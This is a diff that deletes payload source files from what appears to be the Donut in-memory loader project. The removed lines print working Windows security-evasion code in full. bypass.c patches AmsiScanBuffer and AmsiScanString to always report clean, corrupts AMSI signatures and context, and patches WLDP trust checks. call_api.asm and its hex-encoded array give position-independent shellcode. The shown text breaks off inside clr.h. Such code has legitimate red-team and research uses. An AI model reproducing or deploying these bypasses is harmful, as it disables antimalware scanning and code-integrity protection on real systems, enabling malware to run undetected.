406 static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv);
407 static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this);
408 static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this);
409
410 // Informs the host that the scripting engine has begun executing the script code.
411 static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this);
412
413 // Informs the host that the scripting engine has returned from executing script code.
414 static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this);
415
416 // Retrieves the locale identifier that the host uses for displaying user-interface elements.
417 static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *lcid);
418
419 // Retrieves a host-defined string that uniquely identifies the current document version from the host's point of view.
420 static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version);
421
422 // Informs the host that an execution error occurred while the engine was running the script.
423 static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this, IActiveScriptError *scriptError);
424
425 // Informs the host that the scripting engine has changed states.
426 static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state);
427
428 // Obtains information about an item that was added to an engine through a call to the IActiveScript::AddNamedItem method.
429 static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this, LPCOLESTR objectName, DWORD dwReturnMask, IUnknown **objPtr, ITypeInfo **typeInfo);
430
431 // Called when the script has completed execution.
432 static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this, const VARIANT *pvr, const EXCEPINFO *pei);
433
434 #endif
435
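--- a/payload/amsi.h
+++ b/payload/amsi.h
@@ -1,182 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-#ifndef AMSI_H
-#define AMSI_H
-
-#include <windows.h>
-
-DECLARE_HANDLE(HAMSICONTEXT);
-DECLARE_HANDLE(HAMSISESSION);
-
-typedef struct _IAmsiStream IAmsiStream;
-typedef struct _IAntimalware IAntimalware;
-typedef struct _IAntimalwareProvider IAntimalwareProvider;
-
-typedef enum tagAMSI_RESULT {
-// No detection found. Result likely not going to change after future definition update.
-// a.k.a. known good
-AMSI_RESULT_CLEAN = 0,
-// No detection found. Result might change after future definition update.
-AMSI_RESULT_NOT_DETECTED = 1,
-// Detection found. It is recommended to abort executing the content if it is executable, e.g. a script.
-// Return result of 1 - 32767 is estimated risk level that an antimalware provider might indicate.
-// The large the result, the riskier to continue.
-// Any return result equal to or larger than 32768 is consider malware and should be blocked.
-// These values are provider specific, and may indicate malware family or ID.
-// An application should use AmsiResultIsMalware() to determine whether the content should be blocked.
-AMSI_RESULT_DETECTED = 32768,
-} AMSI_RESULT;
-
-typedef enum tagAMSI_ATTRIBUTE {
-// Name/version/GUID string of the calling application.
-AMSI_ATTRIBUTE_APP_NAME = 0,
-// LPWSTR, filename, URL, script unique id etc.
-AMSI_ATTRIBUTE_CONTENT_NAME = 1,
-// ULONGLONG, size of the input. Mandatory.
-AMSI_ATTRIBUTE_CONTENT_SIZE = 2,
-// PVOID, memory address if content is fully loaded in memory. Mandatory unless
-// Read() is implemented instead to support on-demand content retrieval.
-AMSI_ATTRIBUTE_CONTENT_ADDRESS = 3,
-// PVOID, session is used to associate different scan calls, e.g. if the contents
-// to be scanned belong to the sample original script. Return nullptr if content
-// is self-contained. Mandatory.
-AMSI_ATTRIBUTE_SESSION = 4,
-} AMSI_ATTRIBUTE;
-
-typedef struct IAmsiStreamVtbl {
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-IAmsiStream * This,
-REFIID riid,
-void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-IAmsiStream * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-IAmsiStream * This);
-
-HRESULT ( STDMETHODCALLTYPE *GetAttribute )(
-IAmsiStream * This,
-AMSI_ATTRIBUTE attribute,
-ULONG dataSize,
-unsigned char *data,
-ULONG *retData);
-
-HRESULT ( STDMETHODCALLTYPE *Read )(
-IAmsiStream * This,
-ULONGLONG position,
-ULONG size,
-unsigned char *buffer,
-ULONG *readSize);
-
-END_INTERFACE
-} IAmsiStreamVtbl;
-
-typedef struct _IAmsiStream {
-IAmsiStreamVtbl *lpVtbl;
-} AmsiStream;
-
-typedef struct IAntimalwareProviderVtbl {
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-IAntimalwareProvider * This,
-REFIID riid,
-void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-IAntimalwareProvider * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-IAntimalwareProvider * This);
-
-HRESULT ( STDMETHODCALLTYPE *Scan )(
-IAntimalwareProvider * This,
-IAmsiStream *stream,
-AMSI_RESULT *result);
-
-void ( STDMETHODCALLTYPE *CloseSession )(
-IAntimalwareProvider * This,
-ULONGLONG session);
-
-HRESULT ( STDMETHODCALLTYPE *DisplayName )(
-IAntimalwareProvider * This,
-LPWSTR *displayName);
-
-END_INTERFACE
-} IAntimalwareProviderVtbl;
-
-typedef struct _IAntimalwareProvider {
-IAntimalwareProviderVtbl *lpVtbl;
-} AntimalwareProvider;
-
-typedef struct IAntimalwareVtbl {
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface)(
-IAntimalware *This,
-REFIID riid,
-void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-IAntimalware * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-IAntimalware * This);
-
-HRESULT ( STDMETHODCALLTYPE *Scan )(
-IAntimalware * This,
-IAmsiStream *stream,
-AMSI_RESULT *result,
-IAntimalwareProvider **provider);
-
-void ( STDMETHODCALLTYPE *CloseSession )(
-IAntimalware * This,
-ULONGLONG session);
-
-END_INTERFACE
-} IAntimalwareVtbl;
-
-typedef struct _IAntimalware {
-IAntimalwareVtbl *lpVtbl;
-} Antimalware;
-
-typedef struct tagHAMSICONTEXT {
-DWORD Signature; // "AMSI" or 0x49534D41
-PWCHAR AppName; // set by AmsiInitialize
-IAntimalware *Antimalware; // set by AmsiInitialize
-DWORD SessionCount; // increased by AmsiOpenSession
-} _HAMSICONTEXT, *_PHAMSICONTEXT;
-
-#endif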
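--- a/payload/bypass.c
+++ b/payload/bypass.c
@@ -1,373 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-typedef enum _WLDP_HOST_ID {
-WLDP_HOST_ID_UNKNOWN = 0,
-WLDP_HOST_ID_GLOBAL = 1,
-WLDP_HOST_ID_VBA = 2,
-WLDP_HOST_ID_WSH = 3,
-WLDP_HOST_ID_POWERSHELL = 4,
-WLDP_HOST_ID_IE = 5,
-WLDP_HOST_ID_MSI = 6,
-WLDP_HOST_ID_MAX = 7
-} WLDP_HOST_ID, *PWLDP_HOST_ID;
-
-typedef struct _WLDP_HOST_INFORMATION {
-DWORD dwRevision;
-WLDP_HOST_ID dwHostId;
-PCWSTR szSource;
-HANDLE hSource;
-} WLDP_HOST_INFORMATION, *PWLDP_HOST_INFORMATION;
-
-#if defined(BYPASS_AMSI_A)
-
-// fake function that always returns S_OK and AMSI_RESULT_CLEAN
-HRESULT WINAPI AmsiScanBufferStub(
-HAMSICONTEXT amsiContext,
-PVOID buffer,
-ULONG length,
-LPCWSTR contentName,
-HAMSISESSION amsiSession,
-AMSI_RESULT *result)
-{
-*result = AMSI_RESULT_CLEAN;
-return S_OK;
-}
-
-// This function is never called. It's simply used to calculate
-// the length of AmsiScanBufferStub above.
-//
-// The reason it performs a multiplication is because MSVC can identify
-// functions that perform the same operation and eliminate duplicates
-// from the compiled code. Null subroutines are eliminated.
-
-int AmsiScanBufferStubEnd(int a, int b) {
-return a * b;
-}
-
-// fake function that always returns S_OK and AMSI_RESULT_CLEAN
-HRESULT WINAPI AmsiScanStringStub(
-HAMSICONTEXT amsiContext,
-LPCWSTR string,
-LPCWSTR contentName,
-HAMSISESSION amsiSession,
-AMSI_RESULT *result)
-{
-*result = AMSI_RESULT_CLEAN;
-return S_OK;
-}
-
-int AmsiScanStringStubEnd(int a, int b) {
-return a + b;
-}
-
-BOOL DisableAMSI(PDONUT_INSTANCE inst) {
-HMODULE dll;
-DWORD len, op, t;
-LPVOID cs;
-
-// try load amsi. if unable, assume DLL doesn't exist
-// and return TRUE to indicate it's okay to continue
-dll = inst->api.LoadLibraryA(inst->amsi.s);
-if(dll == NULL) return TRUE;
-
-// resolve address of AmsiScanBuffer. if not found,
-// return FALSE because it should exist ...
-cs = inst->api.GetProcAddress(dll, inst->amsiScanBuf);
-if(cs == NULL) return FALSE;
-
-// calculate length of stub
-len = (ULONG_PTR)AmsiScanBufferStubEnd -
-(ULONG_PTR)AmsiScanBufferStub;
-
-DPRINT("Length of AmsiScanBufferStub is %" PRIi32 " bytes.", len);
-
-// check for negative length. this would only happen when
-// compiler decides to re-order functions.
-if((int)len < 0) return FALSE;
-
-// make the memory writeable. return FALSE on error
-if(!inst->api.VirtualProtect(
-cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
-
-DPRINT("Overwriting AmsiScanBuffer");
-// over write with virtual address of stub
-Memcpy(cs, ADR(PCHAR, AmsiScanBufferStub), len);
-// set memory back to original protection
-inst->api.VirtualProtect(cs, len, op, &t);
-
-// resolve address of AmsiScanString. if not found,
-// return FALSE because it should exist ...
-cs = inst->api.GetProcAddress(dll, inst->amsiScanStr);
-if(cs == NULL) return FALSE;
-
-// calculate length of stub
-len = (ULONG_PTR)AmsiScanStringStubEnd -
-(ULONG_PTR)AmsiScanStringStub;
-
-DPRINT("Length of AmsiScanStringStub is %" PRIi32 " bytes.", len);
-
-// check for negative length. this would only happen when
-// compiler decides to re-order functions.
-if((int)len < 0) return FALSE;
-
-// make the memory writeable
-if(!inst->api.VirtualProtect(
-cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
-
-DPRINT("Overwriting AmsiScanString");
-// over write with virtual address of stub
-Memcpy(cs, ADR(PCHAR, AmsiScanStringStub), len);
-// set memory back to original protection
-inst->api.VirtualProtect(cs, len, op, &t);
-
-return TRUE;
-}
-
-#elif defined(BYPASS_AMSI_B)
-
-BOOL DisableAMSI(PDONUT_INSTANCE inst) {
-HMODULE dll;
-PBYTE cs;
-DWORD i, op, t;
-BOOL disabled = FALSE;
-PDWORD Signature;
-
-// try load amsi. if unable to load, assume
-// it doesn't exist and return TRUE to indicate
-// it's okay to continue.
-dll = inst->api.LoadLibraryA(inst->amsi.s);
-if(dll == NULL) return TRUE;
-
-// resolve address of AmsiScanBuffer. if unable, return
-// FALSE because it should exist.
-cs = (PBYTE)inst->api.GetProcAddress(dll, inst->amsiScanBuf);
-if(cs == NULL) return FALSE;
-
-// scan for signature
-for(i=0;;i++) {
-Signature = (PDWORD)&cs[i];
-// is it "AMSI"?
-if(*Signature == inst->amsi.w[0]) {
-// set memory protection for write access
-inst->api.VirtualProtect(cs, sizeof(DWORD),
-PAGE_EXECUTE_READWRITE, &op);
-
-// change signature
-*Signature++;
-
-// set memory back to original protection
-inst->api.VirtualProtect(cs, sizeof(DWORD), op, &t);
-disabled = TRUE;
-break;
-}
-}
-return disabled;
-}
-
-#elif defined(BYPASS_AMSI_C)
-
-// Attempt to find AMSI context in .data section of CLR.dll
-// Could also scan PEB.ProcessHeap for this..
-// Disabling AMSI via AMSI context is based on idea by Matt Graeber
-// https://gist.github.com/mattifestation/ef0132ba4ae3cc136914da32a88106b9
-
-BOOL DisableAMSI(PDONUT_INSTANCE inst) {
-LPVOID clr;
-BOOL disabled = FALSE;
-PIMAGE_DOS_HEADER dos;
-PIMAGE_NT_HEADERS nt;
-PIMAGE_SECTION_HEADER sh;
-DWORD i, j, res;
-PBYTE ds;
-MEMORY_BASIC_INFORMATION mbi;
-_PHAMSICONTEXT ctx;
-
-// get address of CLR.dll. if unable, this
-// probably isn't a dotnet assembly being loaded
-clr = inst->api.GetModuleHandleA(inst->clr);
-if(clr == NULL) return FALSE;
-
-dos = (PIMAGE_DOS_HEADER)clr;
-nt = RVA2VA(PIMAGE_NT_HEADERS, clr, dos->e_lfanew);
-sh = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader +
-nt->FileHeader.SizeOfOptionalHeader);
-
-// scan all writeable segments while disabled == FALSE
-for(i = 0;
-i < nt->FileHeader.NumberOfSections && !disabled;
-i++)
-{
-// if this section is writeable, assume it's data
-if (sh[i].Characteristics & IMAGE_SCN_MEM_WRITE) {
-// scan section for pointers to the heap
-ds = RVA2VA (PBYTE, clr, sh[i].VirtualAddress);
-
-for(j = 0;
-j < sh[i].Misc.VirtualSize - sizeof(ULONG_PTR);
-j += sizeof(ULONG_PTR))
-{
-// get pointer
-ULONG_PTR ptr = *(ULONG_PTR*)&ds[j];
-// query if the pointer
-res = inst->api.VirtualQuery((LPVOID)ptr, &mbi, sizeof(mbi));
-if(res != sizeof(mbi)) continue;
-
-// if it's a pointer to heap or stack
-if ((mbi.State == MEM_COMMIT ) &&
-(mbi.Type == MEM_PRIVATE ) &&
-(mbi.Protect == PAGE_READWRITE))
-{
-ctx = (_PHAMSICONTEXT)ptr;
-// check if it contains the signature
-if(ctx->Signature == inst->amsi.w[0]) {
-// corrupt it
-ctx->Signature++;
-disabled = TRUE;
-break;
-}
-}
-}
-}
-}
-return disabled;
-}
-
-#elif defined(BYPASS_AMSI_D)
-// This is where you may define your own AMSI bypass.
-// To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_AMSI_C defined.
-
-BOOL DisableAMSI(PDONUT_INSTANCE inst) {
-
-}
-
-#endif
-
-#if defined(BYPASS_WLDP_A)
-
-// fake function that always returns S_OK and isApproved = TRUE
-HRESULT WINAPI WldpIsClassInApprovedListStub(
-REFCLSID classID,
-PWLDP_HOST_INFORMATION hostInformation,
-PBOOL isApproved,
-DWORD optionalFlags)
-{
-*isApproved = TRUE;
-return S_OK;
-}
-
-// make sure prototype is different from other null subroutines
-// to avoid duplication by MSVC
-int WldpIsClassInApprovedListStubEnd(int a, int b) {
-return a - b;
-}
-
-// fake function that always returns S_OK
-HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
-HANDLE fileHandle,
-PVOID baseImage,
-ULONG ImageSize)
-{
-return S_OK;
-}
-
-int WldpQueryDynamicCodeTrustStubEnd(int a, int b) {
-return a / b;
-}
-
-BOOL DisableWLDP(PDONUT_INSTANCE inst) {
-HMODULE wldp;
-DWORD len, op, t;
-LPVOID cs;
-
-// try load wldp. if unable, assume DLL doesn't exist
-// and return TRUE to indicate it's okay to continue
-wldp = inst->api.LoadLibraryA(inst->wldp);
-if(wldp == NULL) return TRUE;
-
-// resolve address of WldpQueryDynamicCodeTrust
-// if not found, return FALSE because it should exist
-cs = inst->api.GetProcAddress(wldp, inst->wldpQuery);
-if(cs == NULL) return FALSE;
-
-// calculate length of stub
-len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd -
-(ULONG_PTR)WldpQueryDynamicCodeTrustStub;
-
-DPRINT("Length of WldpQueryDynamicCodeTrustStub is %" PRIi32 " bytes.", len);
-
-// check for negative length. this would only happen when
-// compiler decides to re-order functions.
-if((int)len < 0) return FALSE;
-
-// make the memory writeable. return FALSE on error
-if(!inst->api.VirtualProtect(
-cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
-
-// overwrite with virtual address of stub
-Memcpy(cs, ADR(PCHAR, WldpQueryDynamicCodeTrustStub), len);
-// set back to original protection
-inst->api.VirtualProtect(cs, len, op, &t);
-
-// resolve address of WldpIsClassInApprovedList
-// if not found, return FALSE because it should exist
-cs = inst->api.GetProcAddress(wldp, inst->wldpIsApproved);
-if(cs == NULL) return FALSE;
-
-// calculate length of stub
-len = (ULONG_PTR)WldpIsClassInApprovedListStubEnd -
-(ULONG_PTR)WldpIsClassInApprovedListStub;
-
-DPRINT("Length of WldpIsClassInApprovedListStub is %" PRIi32 " bytes.", len);
-
-// check for negative length. this would only happen when
-// compiler decides to re-order functions.
-if((int)len < 0) return FALSE;
-
-// make the memory writeable. return FALSE on error
-if(!inst->api.VirtualProtect(
-cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
-
-// overwrite with virtual address of stub
-Memcpy(cs, ADR(PCHAR, WldpIsClassInApprovedListStub), len);
-// set back to original protection
-inst->api.VirtualProtect(cs, len, op, &t);
-
-return TRUE;
-}
-#elif defined(BYPASS_WLDP_B)
-// This is where you may define your own WLDP bypass.
-// To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_WLDP_B defined.
-
-BOOL DisableWLDP(PDONUT_INSTANCE inst) {
-
-}
-#endif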
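--- a/payload/call_api.asm
+++ b/payload/call_api.asm
@@ -1,121 +0,0 @@
-;
-; Copyright © 2019 TheWover, Odzhan. All Rights Reserved.
-;
-; Redistribution and use in source and binary forms, with or without
-; modification, are permitted provided that the following conditions are
-; met:
-;
-; 1. Redistributions of source code must retain the above copyright
-; notice, this list of conditions and the following disclaimer.
-;
-; 2. Redistributions in binary form must reproduce the above copyright
-; notice, this list of conditions and the following disclaimer in the
-; documentation and/or other materials provided with the distribution.
-;
-; 3. The name of the author may not be used to endorse or promote products
-; derived from this software without specific prior written permission.
-;
-; THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
-; IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-; WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-; DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
-; INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
-; (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-; SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
-; HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
-; STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-; ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-; POSSIBILITY OF SUCH DAMAGE.
-;
-;
-; void call_api(FARPROC api, int param_cnt, WCHAR param[]);
-
-%define DONUT_MAX_PARAM 8
-%define DONUT_MAX_NAME 256
-
-struc HOME_SPACE
-._rcx resq 1
-._rdx resq 1
-._r8 resq 1
-._r9 resq 1
-endstruc
-
-struc _ds
-.hs: resq HOME_SPACE_size
-
-.arg4 resq 1
-.arg5 resq 1
-.arg6 resq 1
-.arg7 resq 1
-
-._rdi resq 1
-._rsi resq 1
-._rbp resq 1
-._rbx resq 1
-._rsp resq 1
-endstruc
-
-%ifndef BIN
-global call_api
-global _call_api
-%endif
-
-call_api:
-_call_api:
-bits 32
-
-; int3
-
-xor eax, eax ;
-dec eax ;
-jns L2 ; if SF=0, goto x64
-
-mov eax, [esp+ 4] ; eax = api address
-mov ecx, [esp+ 8] ; ecx = param_cnt
-mov edx, [esp+12] ; edx = params
-L1:
-push edx ; save params[i] on stack
-add edx, DONUT_MAX_NAME * 2 ; advance to next element
-sub ecx, 1 ; subtract one from param_cnt
-jnz L1
-call eax ; call api
-ret
-
-L2:
-bits 64
-
-sub rsp, ((_ds_size & -16) + 16) - 8
-
-mov [rsp+_ds._rbp], rbp
-mov [rsp+_ds._rbx], rbx
-mov [rsp+_ds._rdi], rdi
-mov [rsp+_ds._rsi], rsi
-
-mov rsi, rsp ; rsi = rsp after allocation
-mov rdi, rcx ; rdi = api to call
-mov eax, DONUT_MAX_NAME * 2
-
-mov rcx, r8 ; rcx = param[0]
-lea rdx, [rcx+rax] ; rdx = param[1]
-lea r8, [rdx+rax] ; r8 = param[2]
-lea r9, [r8+rax] ; r9 = param[3]
-
-lea rbx, [r9+rax]
-mov [rsp+_ds.arg4], rbx ; param[4]
-add rbx, rax
-mov [rsp+_ds.arg5], rbx ; param[5]
-add rbx, rax
-mov [rsp+_ds.arg6], rbx ; param[6]
-add rbx, rax
-mov [rsp+_ds.arg7], rbx ; param[7]
-call rdi
-
-mov rsp, rsi ; restore rsp after allocation
-mov rsi, [rsp+_ds._rsi]
-mov rdi, [rsp+_ds._rdi]
-mov rbx, [rsp+_ds._rbx]
-mov rbp, [rsp+_ds._rbp]
-
-add rsp, ((_ds_size & -16) + 16) - 8
-ret
-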
+0
-50
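--- a/payload/call_api_bin.h
+++ b/payload/call_api_bin.h
@@ -1,50 +0,0 @@
-
-unsigned int CALL_API_BIN[47];
-
-CALL_API_BIN[0] = 0x7948C031;
-CALL_API_BIN[1] = 0x24448B1B;
-CALL_API_BIN[2] = 0x244C8B04;
-CALL_API_BIN[3] = 0x24548B08;
-CALL_API_BIN[4] = 0xC281520C;
-CALL_API_BIN[5] = 0x00000200;
-CALL_API_BIN[6] = 0x7501E983;
-CALL_API_BIN[7] = 0xC3D0FFF4;
-CALL_API_BIN[8] = 0x48EC8148;
-CALL_API_BIN[9] = 0x48000001;
-CALL_API_BIN[10] = 0x3024AC89;
-CALL_API_BIN[11] = 0x48000001;
-CALL_API_BIN[12] = 0x38249C89;
-CALL_API_BIN[13] = 0x48000001;
-CALL_API_BIN[14] = 0x2024BC89;
-CALL_API_BIN[15] = 0x48000001;
-CALL_API_BIN[16] = 0x2824B489;
-CALL_API_BIN[17] = 0x48000001;
-CALL_API_BIN[18] = 0x8948E689;
-CALL_API_BIN[19] = 0x0200B8CF;
-CALL_API_BIN[20] = 0x894C0000;
-CALL_API_BIN[21] = 0x148D48C1;
-CALL_API_BIN[22] = 0x048D4C01;
-CALL_API_BIN[23] = 0x0C8D4D02;
-CALL_API_BIN[24] = 0x1C8D4900;
-CALL_API_BIN[25] = 0x9C894801;
-CALL_API_BIN[26] = 0x00010024;
-CALL_API_BIN[27] = 0xC3014800;
-CALL_API_BIN[28] = 0x249C8948;
-CALL_API_BIN[29] = 0x00000108;
-CALL_API_BIN[30] = 0x48C30148;
-CALL_API_BIN[31] = 0x10249C89;
-CALL_API_BIN[32] = 0x48000001;
-CALL_API_BIN[33] = 0x8948C301;
-CALL_API_BIN[34] = 0x0118249C;
-CALL_API_BIN[35] = 0xD7FF0000;
-CALL_API_BIN[36] = 0x48F48948;
-CALL_API_BIN[37] = 0x2824B48B;
-CALL_API_BIN[38] = 0x48000001;
-CALL_API_BIN[39] = 0x2024BC8B;
-CALL_API_BIN[40] = 0x48000001;
-CALL_API_BIN[41] = 0x38249C8B;
-CALL_API_BIN[42] = 0x48000001;
-CALL_API_BIN[43] = 0x3024AC8B;
-CALL_API_BIN[44] = 0x48000001;
-CALL_API_BIN[45] = 0x0148C481;
-CALL_API_BIN[46] = 0x00C30000;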
+0
-74
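--- a/payload/clib.c
+++ b/payload/clib.c
@@ -1,74 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-#include <inttypes.h>
-#include <stddef.h>
-
-// functions to replace intrinsic C library functions
-
-// funnily enough, MSVC still tries to replace this
-// with memset hence the use of assembly..
-void *Memset (void *ptr, int value, size_t num) {
-
-#ifdef _MSC_VER
-__stosb(ptr, value, num);
-#else
-unsigned char *p = (unsigned char*)ptr;
-
-while(num--) {
-*p = value;
-p++;
-}
-#endif
-return ptr;
-}
-
-void *Memcpy (void *destination, const void *source, size_t num) {
-unsigned char *out = (unsigned char*)destination;
-unsigned char *in = (unsigned char*)source;
-
-while(num--) {
-*out = *in;
-out++; in++;
-}
-return destination;
-}
-
-int Memcmp(const void *ptr1, const void *ptr2, size_t num) {
-register const unsigned char *s1 = (const unsigned char*)ptr1;
-register const unsigned char *s2 = (const unsigned char*)ptr2;
-
-while (num-- > 0) {
-if (*s1++ != *s2++)
-return s1[-1] < s2[-1] ? -1 : 1;
-}
-return 0;
-}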
+0
-916
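--- a/payload/clr.h
+++ b/payload/clr.h
@@ -1,916 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
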